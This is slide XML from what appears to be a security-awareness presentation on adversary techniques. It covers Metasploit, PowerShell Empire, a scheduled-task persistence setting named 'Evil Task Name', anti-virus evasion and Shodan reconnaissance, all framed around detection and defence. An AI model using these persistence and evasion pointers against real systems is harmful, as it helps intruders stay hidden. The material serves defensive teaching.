              <a:t>Schtasks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> Persistence", %(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>taskname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> =&gt; "Evil Task Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3481385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3D5B9F-5F65-4960-835E-D727153588F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671757" y="1730667"/>
            <a:ext cx="8184662" cy="381162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A51B2D34-B88E-4442-A37C-FF630391AC5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adversary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Metasploit/PowerShell Empire</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02A7F37D-3CE6-483C-A505-CF859DEBCECB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="141515" y="5856780"/>
            <a:ext cx="7358743" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reference:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.metasploit.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.powershellempire.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE2A9D9E-2A80-4F0A-AD3B-059660EE74BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="141515" y="2330832"/>
            <a:ext cx="4354286" cy="2337027"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A768F5DB-B80E-48D1-86E5-F4BAC2229D27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284004" y="3254828"/>
            <a:ext cx="4859995" cy="2939163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1758745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40E38E-4E96-4020-BFA5-10D1CBFDB9CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>PowerShell Empire…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91CF27A0-657D-4CE2-90DA-D1DB843D6857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Empire?Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adversary Techniques?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5614E23B-A88D-47D4-BB14-7094ADD71E7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8227152" y="6057230"/>
            <a:ext cx="629267" cy="628738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3A96221-F893-4246-8A73-7BF1CC44D24C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-76200" y="1627157"/>
            <a:ext cx="9220200" cy="5256780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308482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18FF4B-BBB7-44E5-93F7-2C529B07044F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What you will walk away from here with?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security  awareness of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adversary Tactics/Techniques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>approaches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Motivation to look at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS configurations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>registry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/services), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>logs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and simulate adversaries to figure out how to detect them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC9E3314-2182-414C-A6DD-B11361D72E44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security depends on US!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5461DB0-4E0C-44C2-BB68-71D4F7636111}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Together We Can Defend!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3956665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18061" y="2141838"/>
            <a:ext cx="4601217" cy="3534268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Task Chain for automation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Pro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="818061" y="5913120"/>
            <a:ext cx="8038358" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>SMB Audit: https://blog.rapid7.com/2017/10/31/testing-smb-server-security-with-metasploit-pro-task-chains-part-1/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="548425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Evades detection in more than 90%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Evading Anti-Virus in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Pro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671756" y="2127472"/>
            <a:ext cx="7984563" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://information.rapid7.com/dynamic-payloads-for-av-evasion.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Rapid7 Presents: https://www.youtube.com/watch?reload=9&amp;v=1LZCb4HJlkI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="222974" y="2816352"/>
            <a:ext cx="8633445" cy="3913632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70075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8E4AC2-4AD5-4AF1-89B5-1ED64D80FB3F}"/>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B69FD734-7CEC-4783-9484-F07EB5CCA2C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6122E4E-4374-45BE-BF48-00EA713BB10C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-83127" y="0"/>
            <a:ext cx="9256014" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2762834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91EE18-E39C-4417-B33B-0D3BC292E12F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/vysec/RedTips</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCD08DD3-0358-45A8-BBA4-1740C1ED4BDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More badness? (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adversary Tactics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check with Community </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GitHubs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and Twitter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21FAC993-CE12-4380-922E-FDDEF01D4E64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2141838"/>
            <a:ext cx="7193874" cy="4703354"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6EB171E-F5BE-440C-81EA-91E9259C807D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="468565" y="2141839"/>
            <a:ext cx="1360235" cy="4703354"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3208057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91EE18-E39C-4417-B33B-0D3BC292E12F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.shodan.io</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCD08DD3-0358-45A8-BBA4-1740C1ED4BDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What Internet? (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adversary Tactics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) Check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shodan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="468565" y="3745429"/>
            <a:ext cx="8611802" cy="2610214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3562632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Adversary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Scripting Languages, Why use one over the other?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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0435"/>
            <a:ext cx="9144000" cy="2227049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1816608"/>
            <a:ext cx="8034528" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Go to site and get more info, the take away here is that we need to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Focus on behavior </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to catch the sneaky attackers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
